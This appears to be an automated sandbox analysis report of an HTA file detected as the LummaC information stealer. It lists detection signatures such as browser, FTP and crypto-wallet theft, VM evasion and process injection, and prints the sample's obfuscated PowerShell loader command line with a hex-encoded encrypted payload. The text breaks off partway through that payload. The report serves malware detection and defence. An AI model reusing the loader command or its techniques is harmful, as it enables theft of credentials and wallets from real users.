Windows Analysis Report
winwidgetshp.mp4.hta
Overview
General Information
Detection
LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign process
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7064, cmdline: mshta.exe "C:\Users\user\Desktop\winwidgetshp.mp4.hta", MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 2656, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$&')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D